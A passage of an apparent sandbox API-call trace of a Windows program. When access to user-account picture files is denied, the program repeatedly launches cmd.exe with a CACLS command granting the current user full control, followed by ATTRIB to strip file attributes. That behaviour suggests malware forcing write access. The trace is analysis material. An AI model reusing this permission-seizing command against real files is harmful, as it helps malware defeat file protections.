returned 0x0 [0185.467] ReleaseMutex (hMutex=0xf8) returned 1 
[0185.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.468] ReleaseMutex (hMutex=0xf8) returned 1 [0185.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.468] ReleaseMutex (hMutex=0xf8) returned 1 [0185.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.468] ReleaseMutex (hMutex=0xf8) returned 1 [0185.468] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.468] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", lpFilePart=0x12eab4*="usertile25.bmp") returned 0x52 [0185.468] GetLastError () returned 0x5 [0185.468] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0185.468] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.468] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0185.468] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.468] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.468] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.468] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0185.468] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0185.468] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf70, dwThreadId=0xe70)) returned 1 [0185.470] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0185.615] CloseHandle 
(hObject=0x1b4) returned 1 [0185.615] CloseHandle (hObject=0x120) returned 1 [0185.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.615] ReleaseMutex (hMutex=0xf8) returned 1 [0185.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.615] ReleaseMutex (hMutex=0xf8) returned 1 [0185.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.616] ReleaseMutex (hMutex=0xf8) returned 1 [0185.616] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.616] ReleaseMutex (hMutex=0xf8) returned 1 [0185.616] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.616] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", lpFilePart=0x12eab4*="usertile25.bmp") returned 0x52 [0185.616] GetLastError () returned 0x5 [0185.616] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0185.616] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.616] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0185.616] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.616] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.616] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.616] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.616] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.616] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0185.616] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.616] ReleaseMutex (hMutex=0xf8) returned 1 [0185.616] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.616] ReleaseMutex (hMutex=0xf8) returned 1 [0185.616] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.616] ReleaseMutex (hMutex=0xf8) returned 1 [0185.617] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.617] ReleaseMutex (hMutex=0xf8) returned 1 [0185.617] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0185.617] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp", lpFilePart=0x12eab4*="usertile26.bmp") returned 0x52 [0185.617] GetLastError () returned 0x5 [0185.617] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0185.617] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.617] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0185.617] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.617] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.617] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.617] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0185.617] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0185.617] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe9c, dwThreadId=0xe5c)) returned 1 [0185.619] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0185.960] CloseHandle (hObject=0x1b4) returned 1 [0185.961] CloseHandle (hObject=0x120) returned 1 [0185.961] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.961] ReleaseMutex (hMutex=0xf8) returned 1 [0185.961] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.961] ReleaseMutex (hMutex=0xf8) returned 1 [0185.961] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.961] ReleaseMutex (hMutex=0xf8) returned 1 [0185.961] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.961] ReleaseMutex (hMutex=0xf8) returned 1 [0185.961] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.961] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile26.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp", lpFilePart=0x12eab4*="usertile26.bmp") returned 0x52 [0185.961] GetLastError () returned 0x5 [0185.961] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0185.961] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.961] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0185.961] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.961] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.962] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.962] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.962] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0185.962] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0185.962] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.962] ReleaseMutex (hMutex=0xf8) returned 1 
[0185.962] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.962] ReleaseMutex (hMutex=0xf8) returned 1 [0185.962] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.962] ReleaseMutex (hMutex=0xf8) returned 1 [0185.962] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.962] ReleaseMutex (hMutex=0xf8) returned 1 [0185.962] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.963] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", lpFilePart=0x12eab4*="usertile27.bmp") returned 0x52 [0185.963] GetLastError () returned 0x5 [0185.963] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0185.963] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.963] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0185.963] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0185.963] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.963] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0185.963] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0185.963] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0185.963] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xdac, dwThreadId=0x8fc)) returned 1 [0185.965] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0186.141] CloseHandle 
(hObject=0x1b4) returned 1 [0186.141] CloseHandle (hObject=0x120) returned 1 [0186.141] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.141] ReleaseMutex (hMutex=0xf8) returned 1 [0186.141] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.141] ReleaseMutex (hMutex=0xf8) returned 1 [0186.141] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.141] ReleaseMutex (hMutex=0xf8) returned 1 [0186.142] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.142] ReleaseMutex (hMutex=0xf8) returned 1 [0186.142] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.142] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", lpFilePart=0x12eab4*="usertile27.bmp") returned 0x52 [0186.142] GetLastError () returned 0x5 [0186.142] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0186.142] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.142] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0186.142] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.142] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.142] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.142] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.142] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.142] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0186.142] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.142] ReleaseMutex (hMutex=0xf8) returned 1 [0186.142] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.142] ReleaseMutex (hMutex=0xf8) returned 1 [0186.142] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.142] ReleaseMutex (hMutex=0xf8) returned 1 [0186.142] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.142] ReleaseMutex (hMutex=0xf8) returned 1 [0186.143] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0186.143] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp", lpFilePart=0x12eab4*="usertile28.bmp") returned 0x52 [0186.143] GetLastError () returned 0x5 [0186.143] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0186.143] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.143] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.143] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.143] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.143] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.143] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0186.143] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0186.143] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf74, dwThreadId=0xf80)) returned 1 [0186.145] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0186.467] CloseHandle (hObject=0x1b4) returned 1 [0186.467] CloseHandle (hObject=0x120) returned 1 [0186.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.467] ReleaseMutex (hMutex=0xf8) returned 1 [0186.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.467] ReleaseMutex (hMutex=0xf8) returned 1 [0186.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.467] ReleaseMutex (hMutex=0xf8) returned 1 [0186.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.467] ReleaseMutex (hMutex=0xf8) returned 1 [0186.467] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.468] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
